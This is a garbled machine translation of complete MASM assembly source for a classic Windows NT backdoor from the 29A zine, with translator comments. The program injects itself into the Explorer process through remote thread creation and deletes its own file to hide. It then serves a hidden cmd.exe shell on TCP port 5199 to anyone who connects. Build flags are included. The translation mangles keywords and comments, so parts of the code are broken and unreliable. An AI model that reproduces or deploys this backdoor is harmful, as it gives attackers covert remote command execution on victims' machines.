Tiny nt backdoor by aphex to icefox) [classic !]

; Tiny nt backdoor by aphex
Http://www.iamaphex.cjb.net
Unremote@knology.net
; Original 29A #7 [index-utilities-tiny nt backdoor (aphex)]
Translation: icyfox [Ice Fox prodigal son]/CVC translation team
I am often sad for what I get because of poor e-text.
To support the CvC translation business, we decided to first look for something that hardly needed translation.
I just express the original meaning, not literal translation
I added some comments to the source code.
I hope you can work hard. I am your super supporter.

; Start pulling!

When the program runs, it inserts a remote thread that listens to port 5199 in the assumer.exe process,
And delete itself in the remote thread, so that no trace is left!

The plug-in line is a DOS command (cmd.exe) pipeline for each connection, used to execute commands
When the connection is disconnected, the cmd.exe process is stopped.
The compile connection command is as follows:
; [Translator's note: And remember/base: 0x13140000, that is, to change the base address. The key is, this is the highlight of this program! In this way, you do not need to relocate.]

; Linker Options:/base: 0x13140000/filealign: 0x200/merge :. data =. text/section :. text, rwx/subsystem: Windows/libpath:/masm32/lib backdoor. OBJ

. 386
. Model flat, stdcall
Option Casemap: None
Include/masm32/include/Windows. inc
Include/masm32/include/kernel32.inc
Includelib/masm32/lib/kernel32.lib
Include/masm32/include/user32.inc
Includelib/masm32/lib/user32.lib
Include/masm32/include/wsock32.inc
Includelib/masm32/lib/wsock32.lib

. Data
Sztarget byte 'Shell _ traywnd', 0133 is used in the assumer.exe Process
Szuser32 byte 'user32. dll ', 0; load the two DLL files in a remote thread
Szwinsock byte 'wsock32. dll '. If the value is 0, the assumer.exe itself has been loaded.
Szcommandline byte 'cmd.exe ', 0
Szshareddata byte 261 DUP (0); Save the path here and use

. Data?
Hmodule DWORD?
Hnewmodule DWORD?
Hprocess DWORD?
Dwsize DWORD?
Dwpid DWORD?
Dwbyteswritten DWORD?
Dwtid DWORD?
Wsadata <>

. Code
Shellclient provides the CMD command pipeline for each connection

Shellclient proc dwsock: DWORD
Local SAT: security_attributes
Local hiread: DWORD
Local horead: DWORD
Local hiwrite: DWORD
Local howrite: DWORD
Local startupinfo: startupinfo
Local processinfo: process_information
Local exitcode: DWORD
Local Buffer [1024]: byte
Local Bytes: DWORD
Local available: DWORD
Local data: DWORD

MoV sat. nlength, sizeof security_attributes
MoV sat. lpsecuritydescriptor, 0
MoV sat. binherithandle, true
; Create an anonymous read/write Pipeline
Invoke createpipe, ADDR hiread, ADDR hiwrite, ADDR sat, 0
Invoke createpipe, ADDR horead, ADDR howrite, ADDR sat, 0

Establish a cmd process that uses pipelines for input and output for command execution and result feedback
Invoke getstartupinfo, ADDR startupinfo
MoV startupinfo. CB, sizeof startupinfo
MoV eax, howrite
MoV startupinfo. hstdoutput, eax
MoV startupinfo. hstderror, eax
MoV eax, hiread
MoV startupinfo. hstdinput, eax
MoV startupinfo. dwflags, startf_useshowwindow + startf_usestdhandles
MoV startupinfo. wshowwindow, sw_hide
Invoke CreateProcess, 0, ADDR szcommandline, 0, 0, true, create_new_console, 0, 0, ADDR startupinfo, ADDR processinfo

Invoke closehandle, howrite
Invoke closehandle, hiread
MoV bytes, 1
Invoke ioctlsocket, dwsock, fionbio, ADDR bytes; set to non-blocking mode

. While true
Invoke sleep, 1

CMD process closes connection after termination
Invoke getexitcodeprocess, processinfo. hprocess, ADDR exitcode
. If exitcode! = Still_active
. Break
. Endif

; Read the command execution result and send
Invoke peeknamedpipe, horead, ADDR buffer, 1024, ADDR bytes, ADDR available, 0
. If bytes! = 0
. If available> 1024
. While bytes> = 1024
Invoke sleep, 1
Invoke readfile, horead, ADDR buffer, 1024, ADDR bytes, 0
. If bytes! = 0
Invoke send, dwsock, ADDR buffer, bytes, 0
. Endif
. Endw
. Else
Invoke readfile, horead, ADDR buffer, 1024, ADDR bytes, 0
. If bytes! = 0
Invoke send, dwsock, ADDR buffer, bytes, 0
. Endif
. Endif
. Endif

; Accept the command and write it to the MPs queue for execution
Invoke Recv, dwsock, ADDR buffer, 1024, 0
. If eax = socket_error | eax = 0
Invoke wsagetlasterror
. If eax = wsaewouldblock
. Continue
. Else
Invoke terminateprocess, processinfo. hprocess, 0; terminate the CMD process if the connection is disconnected
. Break
. Endif
. Else
MoV edX, eax
Invoke writefile, hiwrite, ADDR buffer, EDX, ADDR bytes, 0
Here, you can add send to display the command echo. Otherwise, you cannot view the command you entered but only the result.
Like a blind man ^ 8 ^
. Endif
. Endw
Close the MPs queue and connection.
Invoke closehandle, hiwrite
Invoke closehandle, horead
Invoke closesocket, dwsock
RET
Shellclient endp

; Shelld is the entry to the remote thread
Shelld proc
Local sockaddrin: sockaddr_in
Local dwsock: DWORD
Local dwmode: DWORD

Invoke deletefile, ADDR szshareddata; self-Deleted
Invoke loadlibrary, ADDR szuser32; load DLL,
Invoke loadlibrary, ADDR szwinsock; it seems unnecessary

; Initialize and listen on 5199
Invoke wsastartup, 101 H, ADDR wsadata
Invoke socket, pf_inet, sock_stream, 0
MoV dwsock, eax
MoV sockaddrin. sin_family, af_inet
Invoke htons, 5199
MoV sockaddrin. sin_port, ax
MoV sockaddrin. sin_addr, inaddr_any
Invoke bind, dwsock, ADDR sockaddrin, sizeof sockaddrin
MoV dwmode, 1
Invoke ioctlsocket, dwsock, fionbio, ADDR dwmode
Invoke listen, dwsock, somaxconn
@@:
Invoke accept, dwsock, ADDR sockaddrin, 0
. If eax! = Invalid_socket
MoV edX, eax
; Create a thread to process the connection, that is, the shellclient above
Invoke createthread, 0, 0, ADDR shellclient, EDX, 0, 0
Invoke closehandle, eax
. Endif
Invoke sleep, 1000
JMP @ B
RET
Shelld endp

Start:

; Read the base address and size of your memory image
Invoke getmodulehandle, 0
MoV hmodule, eax; Save the base address here
MoV EDI, eax
Assume EDI: PTR image_dos_header
Add EDI, [EDI]. e_lfanew
Add EDI, sizeof DWORD
Add EDI, sizeof image_file_header
Assume EDI: PTR image_optional_header32
MoV eax, [EDI]. sizeofimage
MoV dwsize, eax; memory image size.
Assume EDI: Nothing

Invoke getmodulefilename, 0, ADDR szshareddata, 261; save its own path and use

Attackers can check and obtain permissions to access the assumer.exe process.
Invoke findwindow, ADDR sztarget, 0
Invoke getwindowthreadprocessid, eax, ADDR dwpid
Invoke OpenProcess, process_all_access, false, dwpid
MoV hprocess, eax

The worker allocates memory in the assumer.exe process and writes all of its own data,
The allocated memory starts from 0x13140000, that is, the base address of the memory image.
This is also the reason for determining the basis for connecting to er.exe.

Invoke virtualfreeex, hprocess, hmodule, 0, mem_release
Invoke virtualallocex, hprocess, hmodule, dwsize, mem_commit or mem_reserve, page_execute_readwrite
MoV hnewmodule, eax
Invoke writeprocessmemory, hprocess, hnewmodule, hmodule, dwsize, ADDR dwbyteswritten

; Create a Remote Explorer thread
Invoke createremotethread, hprocess, 0, 0, ADDR shelld, hmodule, 0, ADDR dwtid
Invoke exitprocess, 0
End start

Appendix: I have discussed with Cai CAI about the program's own encryption. I hope he can create a model.